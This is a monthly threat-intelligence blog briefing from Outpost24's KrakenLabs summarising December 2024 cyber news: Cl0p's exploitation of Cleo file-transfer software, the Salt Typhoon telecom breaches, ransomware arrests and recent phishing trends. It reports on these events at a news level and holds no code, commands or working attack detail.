Threat Context Monthly: Executive intelligence briefing for December 2024
Welcome to the Threat Context Monthly blog series where we provide a comprehensive roundup of the most relevant cybersecurity news and threat information from KrakenLabs, Outpost24’s cyber threat intelligence team. Here’s what you need to know from December.
Threat actor of the month: Cl0p
“Cl0p” is a financially motivated ransomware group active since 2016 focused on double extortion ransomware campaigns, where they not only encrypt the victim’s systems, but also threaten to publish stolen data from the victim on their Data Leak Site (DLS) dubbed CL0P^_- LEAKS. Besides using phishing campaigns as their initial access vector, the group’s techniques have also evolved into targeting vulnerable exposed software as an initial access technique either to deploy Clop ransomware or other payloads such as Truebot, DEWMODE, or LEMURLOOT aimed at exfiltrating information from their victims.
In December 2024, they have claimed responsibility for exploiting zero-day vulnerabilities in Cleo’s managed file transfer platforms, impacting Harmony, VLTrader, and LexiCom products. Leveraging flaws tracked as CVE-2024-50623 and CVE-2024-55956, the group gained remote access to the networks and deployed a backdoor dubbed Malichus to steal data. The Malichus backdoor embeds a PowerShell loader, a Java downloader, and a modular Java framework for file exfiltration, command execution, and persistence via custom C2 protocols.
Since 2020, Cl0p has shifted its focus to exploiting vulnerabilities in secure file transfer solutions, targeting platforms like Accellion FTA, SolarWinds Serv-U, GoAnywhere MFT, and MOVEit Transfer. This tactic has enabled widespread data theft, with MOVEit attacks affecting over 2,700 organizations in 2023. Cl0p‘s latest campaign targeting Cleo reinforces its expertise in using zero-days to infiltrate corporate networks and exfiltrate sensitive data.
In a statement on their DLS, Cl0p confirmed responsibility for the Cleo attacks, indicating its intent to delete older breach data and focus on the new victims. Their extortion practices have drawn attention from US authorities, with an $10 million bounty offered for evidence linking Cl0p’s activities to a foreign government. The scale of the Cleo breach remains unclear, but the incident can potentially impact hundreds of organizations, as happened with MOVEit attacks.
Spotlight threat: Salt Typhoon compromises telco companies
“Salt Typhoon” is a highly skilled Chinese APT active since around mid-2019 that has historically targeted relevant companies such as government entities, telecom companies, and the hospitality sector. For gaining access, the group aggressively targets the victim’s public-facing servers, namely known remote code execution (RCE) vulnerabilities in Microsoft Exchange servers, Microsoft SharePoint, Apache, and Oracle Opera. The group leverages LOLBins (ProcDump) and open-source tools (Mimikatz), together with custom backdoors (SparrowDoor) and kernel-mode rootkits (Demodex).
On October 2024, FBI and CISA released a joint statement to confirm they were investigating the unauthorized access to commercial telecommunications infrastructure by actors affiliated with the People’s Republic of China (PRC). The statement came after the Wall Street Journal reported that some US broadband providers like Verizon, AT&T, and Lumen Technologies were breached by the Chinese hacking group tracked as Salt Typhoon.
In a second statement from November 13, the agencies confirmed the espionage goal. Targeting these telecommunications companies would have enabled the theft of customer call records data and the compromise of private communications from individuals involved in government or political activity, as well as stealing information subject to US law enforcement requests pursuant to court orders. In an interview with The Washington Post, a senior US senator would have described this attack as the “worst telecom hack in our nation’s history -by far”, with the attackers having been able to listen in on audio calls in real time and in some cases to move from one telecom network to another, exploiting relationships of trust.
On December 3, multiple government agencies from the US, the UK, Australia, and Canada (which also confirmed affectation), joined forces to release a guide for network engineers and defenders of communications infrastructure with best practices to strengthen their visibility and harden their network devices against exploitation. The next day, these US government agencies held a classified briefing for senators on this issue and, in a call with reporters, confirmed they had been investigating the incident since last spring and that there were still unanswered questions, including the extent of the breach itself.
KrakenLabs observed highlights
Law enforcement operations
Ransomware affiliate arrested: Russian authorities have arrested a ransomware affiliate, Mikhail Pavlovich Matveev (also known as “Wazawaka“), and charged him for developing malware and his role in several hacking groups. Learn more →
Lockbit developer pending extradition: Israeli court has arrested and is reviewing US extradition request for Rostislav Panev, an alleged malware developer who worked for the LockBit ransomware group since 2019. Learn more →
Trends
Domain abuse: Cloudflare’s legitimate domains used for development of web pages and sites and deployment services, are being increasingly abused by cybercriminals for attacks such as phishing redirects, phishing pages and targeted email lists. Attackers get to lead the victims to fraudulent content that is not being flagged by security products thanks to Cloudflare’s reputation. Learn more →
SVG as phishing vector: Attackers are leveraging various techniques to evade detection in their phishing campaigns, such as relying on Scalable Vector Graphics (SVG) attachments to display phishing forms or deploy malware, and attaching ZIP archives or Office files intentionally corrupted in such a way that they cannot be scanned. Learn more →
Phishing Weather apps: Switzerland’s National Cyber Security Centre (NCSC) has issued an alert about citizens receiving physical letters with MeteoSwiss as the sender, asking them to download a new “Severe Weather Warning App” via a QR code. Scanning the code will lead to the download of an Android malware called “Coper”. Learn more →
Worrisome increase of vulnerabilities: Microsoft’s 2024 Patch Tuesday has addressed over 1,000 CVEs -the second-highest count in its 21-year history. The year was particularly challenging with 22 zero-day vulnerabilities, of which 36.4% were Elevation of Privilege (EoP) flaws, often targeted by APT actors. Learn more →
Ransomware
Ransomware vs industrial sectors: RansomHub emerged as the most active group against industrial sectors with 90 incidents (16% of all activity) on 2024 3rd quarter, while LockBit 3.0 maintained a strong presence despite operational disruptions. The quarter witnessed the emergence of 20 new ransomware groups, including APT73, Fog, and Helldown, demonstrating the ecosystem’s dynamic nature. Learn more
What’s new in Threat Context this month?
Threat actors: Termite, ImpactSolutions, Chort Group, SafePay, Hive0145, Helldown, Hellcat, LogsDiller, Muddling Meerkat, Scribble Hemlock, Bluebox, Gamenode Hemlock, Abyssal Hemlock, Frag, YT&TEAM, Argonauts Group, Fatherofcarders, CyberVolk.
Tools: DeepData, WezRat, Craxs Rat, SafePay ransomware, Braodo Stealer, RingQ, Helldown, GloveStealer, BabbleLoader, NodeLoader, Gabagool, ChortLocker, Termite ransomware plus more!
Try Threat Compass for yourself
Want more threat intel? Get started with Threat Compass to receive the latest actionable intelligence from our world-class in-house analyst team. Request a live demo here.